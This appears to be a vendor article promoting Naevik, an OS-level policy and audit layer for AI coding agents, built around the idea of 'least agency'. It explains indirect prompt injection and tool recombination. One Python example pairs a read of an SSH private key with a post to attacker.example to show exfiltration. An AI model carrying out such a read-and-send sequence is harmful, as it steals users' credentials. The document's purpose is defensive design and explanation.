Zero Trust

Least agency needs an enforcement point. That point is the OS.

Anthropic’s Zero Trust for AI Agents names the principle that matters most for agentic software: govern what an agent can do, not just what it can access. Prompt- and tool-layer controls reduce the risk that an agent is compromised; host-level enforcement bounds the damage when one is.

From least privilege to least agency

Least agency needs an enforcement point. For AI agents running on your machine, that point is the operating system.

Anthropic’s Zero Trust for AI Agents gives the right name to one of the most important principles for agentic software: govern what an agent can do, not only what it can access. The term itself comes from the OWASP Top 10 for Agentic Applications, which extends least privilege and “excessive agency” into least agency. Least privilege asks whether an identity can reach a resource. Least agency asks a sharper question: once an agent can reach something, which actions is it actually allowed to take?

That distinction matters because agents don’t behave like traditional software. They interpret goals, choose their own tools, and chain multi-step actions you never scripted across files, processes, APIs, and networks. Least privilege was built for traditional software; least agency is built for agents. In practice it looks like this: a database tool that can only read, a summarizer that can’t send or delete, an agent that can run a build but can’t open a connection to an unknown host.
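The difference between the two questions can be sketched in a few lines of Python. This is an illustration only: the agent names, resource names, and the `Grant` structure are hypothetical and are not taken from Anthropic’s framework, OWASP, or Naevik.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Grant:
    """What one agent may do with one resource it can already reach."""
    resource: str
    actions: frozenset


# Hypothetical grants mirroring the three examples in the text.
GRANTS = {
    "db-tool": [Grant("orders-db", frozenset({"read"}))],
    "summarizer": [Grant("mailbox", frozenset({"read"}))],
    "build-agent": [Grant("workspace", frozenset({"read", "write", "execute"}))],
}


def can_reach(agent: str, resource: str) -> bool:
    """Least privilege: is the resource reachable at all?"""
    return any(g.resource == resource for g in GRANTS.get(agent, []))


def may_act(agent: str, resource: str, action: str) -> bool:
    """Least agency: is this specific action allowed on a reachable resource?"""
    return any(
        g.resource == resource and action in g.actions
        for g in GRANTS.get(agent, [])
    )
```

Here `can_reach("summarizer", "mailbox")` is true, yet `may_act("summarizer", "mailbox", "send")` is false: the summarizer reaches the mailbox but has no agency to send from it.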

The enforcement boundary that matters

Naming the principle is the easy part. The framework is right to call for sandboxing, access scoping, input and output controls, and memory safeguards. The question that decides whether any of it holds is where the boundary is actually enforced — and most of the obvious places can be talked around.

The prompt layer can’t be the boundary. In practice you should not rely on a model to consistently distinguish untrusted data it is reading from instructions it should follow; indirect prompt injection — a malicious instruction buried in a web page or email the agent processes — turns exactly that ambiguity into action. The framework’s own stance is to assume the model layer can be compromised.

The tool layer can’t fully be the boundary either. Allow-listing tools helps, but a capable agent recombines legitimate tools into harmful sequences: a read tool plus a network tool becomes exfiltration, and each call, viewed alone, looks fine.
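A small sketch makes the recombination problem concrete. The tool names, paths, and the sensitive-path prefixes below are all hypothetical, and the sequence check is a deliberately naive heuristic that only shows what a per-call allow-list cannot see; it is not offered as a defense.

```python
# Hypothetical tool allow-list: every tool here is legitimate on its own.
ALLOWED_TOOLS = {"read_file", "http_post", "run_build"}

# Hypothetical locations an agent should never ship off the machine.
SENSITIVE_PREFIXES = ("/home/dev/.ssh/", "/home/dev/.aws/")


def call_allowed(tool: str) -> bool:
    """Per-call check: is this tool on the allow-list?"""
    return tool in ALLOWED_TOOLS


def sequence_exfiltrates(calls: list[tuple[str, str]]) -> bool:
    """Naive sequence check: a sensitive read followed later by an outbound post."""
    read_sensitive = False
    for tool, target in calls:
        if tool == "read_file" and target.startswith(SENSITIVE_PREFIXES):
            read_sensitive = True
        elif tool == "http_post" and read_sensitive:
            return True
    return False


# Two individually acceptable calls that together move a private key off the host.
calls = [
    ("read_file", "/home/dev/.ssh/id_ed25519"),
    ("http_post", "https://attacker.example/upload"),
]
every_call_passes = all(call_allowed(tool) for tool, _ in calls)
```

Every call passes the allow-list, and the pair is still exfiltration. An agent that is allowed to run scripts could also route the same two steps through a single script and skip the sequence check entirely, which is why the argument keeps moving down the stack.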

What’s left is the layer underneath all of it — the one place every tool call, every script, every file write, every outbound connection ultimately resolves: the operating system. Process execution, file access, and network connections are where “what an agent is allowed to do” stops being a policy document and becomes an enforced fact.

Prompt- and tool-layer controls reduce the risk that an agent is compromised. Host-level enforcement bounds the damage when one is. The boundary that holds is the one the agent can’t argue with.

The test that decides which controls are real

Anthropic’s framework offers a single test that cuts through most security theater: does your control make an attack impossible, or merely inconvenient? Tireless, automatable, near-zero-cost attackers grind down anything that only adds friction. The controls that survive remove capability outright — its rule of thumb is, when in doubt, remove a capability rather than restrict it.

That is what host-level enforcement does for agent actions. When policy says an agent may not execute an unapproved binary, write outside its workspace, or open a connection to an unapproved host, the OS doesn’t make that harder — it refuses it. A denied process launch returns an error; a denied file open never opens; a denied connection never completes. For the actions it mediates, that is an impossibility control rather than a friction control — a kernel denial can’t be argued out of the way a prompt or a tool list can.
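The decision logic behind those three denials can be modeled in user space. The sketch below is not Naevik’s policy format or any OS API; the `Policy` fields, action kinds, paths, and host names are assumptions chosen for illustration. A real enforcement point makes this decision inside the OS authorization path, where it also resolves symlinks and other aliases that this model ignores.

```python
from dataclasses import dataclass
from pathlib import PurePosixPath


@dataclass(frozen=True)
class Policy:
    """Hypothetical default-deny policy for one agent."""
    allowed_binaries: frozenset
    workspace: PurePosixPath
    allowed_hosts: frozenset


def decide(policy: Policy, kind: str, target: str) -> str:
    """Return "allow" or "deny"; anything not explicitly allowed is denied."""
    if kind == "exec":
        return "allow" if target in policy.allowed_binaries else "deny"
    if kind == "write":
        path = PurePosixPath(target)
        # Reject relative paths and ".." segments instead of trying to normalize them.
        if not path.is_absolute() or ".." in path.parts:
            return "deny"
        inside = path == policy.workspace or policy.workspace in path.parents
        return "allow" if inside else "deny"
    if kind == "connect":
        return "allow" if target in policy.allowed_hosts else "deny"
    # Unknown action kinds fall through to deny: the capability is simply absent.
    return "deny"


POLICY = Policy(
    allowed_binaries=frozenset({"/usr/bin/make"}),
    workspace=PurePosixPath("/work/repo"),
    allowed_hosts=frozenset({"registry.example.internal"}),
)
```

With this policy, `decide(POLICY, "exec", "/tmp/dropper")`, `decide(POLICY, "write", "/etc/passwd")`, and `decide(POLICY, "connect", "unknown.example")` all return `"deny"`. The final fall-through is the design choice that matters: an action kind the policy never mentions is refused rather than permitted.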

Assume breach, then bound the blast radius

Put the two ideas together. Prompt injection is not a rare edge case; it is a recurring failure mode across agentic workflows. So assume the agent will be compromised at some point. The useful question is no longer “how do we keep it from being compromised?” but “when it is, what can it still do?”

That is the blast radius. An agent turned against you still can’t run a binary that isn’t allow-listed, still can’t read files outside policy, still can’t reach a network endpoint policy forbids — if those limits are enforced below the model, at the host. Enforce least agency anywhere above the OS and a compromised agent can argue or recombine its way around it. Enforce it at the OS and the argument is over.

What Naevik is not

Honesty is part of a real defense, so it’s worth being precise about the boundary before claiming the value. Naevik is not a prompt-injection filter and not a jailbreak classifier. Input and output controls — spotlighting, classifier-based filtering, human-in-the-loop approval — belong in your stack, and they lower the odds that an agent is compromised. Naevik works one layer down and assumes those controls can be bypassed. Its job is to bound the damage when an agent is compromised anyway. The two are complementary, not competing.

Where Naevik fits

Within Zero Trust for AI Agents, Naevik is the host enforcement point for the action-level half of the model. It mediates what AI coding agents — Claude Code, Claude Desktop, agents inside VS Code, and others — are allowed to execute, touch, and connect to, evaluated at the OS before the action takes effect.

Framework calls for | Naevik on the host
Access & privilege: default-deny; define allowed/denied actions per agent | Strict posture: default-deny + allow-list; per-rule allow/deny on process, file, and network actions
Isolation: “isolate at the receiving end” | Process, file, and network ACLs on the machine where the agent actually acts
Observability: full logs with context, immutable trail | Local audit log of every mediated action, with context; uploaded to the management server for retention
Monitoring & response: baseline, then contain | Log-only or blocking enforcement, set per policy

The enforcement uses whatever authorization path each OS actually provides. On Linux, that can mean BPF LSM. On macOS, Endpoint Security covers process and file authorization, while network controls use platform-native filtering. On Windows, a kernel-mode driver enforces it. In each case the decision is made before a process launches, a file is accessed, or an outbound connection completes. None of it trusts the prompt.

That enforcement layer is only getting deeper: agent-control primitives are starting to move into the OS and down into silicon, from Windows and NVIDIA’s RTX Spark platform to BlueField DPUs in the data center. That is the same argument one level lower (the boundary belongs below the agent), and it is a story of its own: agent security is moving into silicon. Naevik’s role doesn’t change: it is the cross-platform, agent-agnostic policy and audit layer that rides whatever primitive each system provides.

There is a second benefit when an attack is novel: because Naevik logs every mediated action, an agent that tries something outside policy doesn’t just get blocked — it leaves a record of what it attempted, and when.
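As a rough sketch of what such a record might carry, the function below logs every mediated action and then applies either log-only or blocking enforcement. The field names, the mode strings, and the JSON layout are assumptions made for this example, not Naevik’s actual log schema.

```python
import json
from datetime import datetime, timezone


def mediate(action: dict, allowed: bool, mode: str, log: list) -> bool:
    """Record one mediated action and return whether it may proceed.

    mode is "log-only" or "blocking" (hypothetical names). In log-only mode a
    policy denial is recorded but the action still goes ahead.
    """
    if mode not in ("log-only", "blocking"):
        raise ValueError(f"unknown mode: {mode}")
    proceed = allowed or mode == "log-only"
    record = {
        "time": datetime.now(timezone.utc).isoformat(),
        "agent": action["agent"],
        "kind": action["kind"],
        "target": action["target"],
        "policy_verdict": "allow" if allowed else "deny",
        "enforced": "allowed" if proceed else "blocked",
    }
    # One JSON object per entry, appended whether or not the action proceeds.
    log.append(json.dumps(record, sort_keys=True))
    return proceed
```

Keeping `policy_verdict` separate from `enforced` means a log-only rollout still shows exactly which actions would have been blocked, which is the baseline the framework asks for before moving to containment.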

Designed for breach from day one

Anthropic’s framework closes on a line worth keeping: the best-prepared organizations aren’t the ones with the most advanced AI — they’re the ones architected for breach from day one. For an AI agent on your machine, that has a concrete meaning. The agent may be useful; the model may be tricked; the host can still enforce the boundary.

That’s where Naevik starts. You write the policy — what each agent may run, read, and reach — and the operating system enforces it. Least agency stops being a principle on a page and becomes a check the OS runs before each mediated process, file, or network action completes.
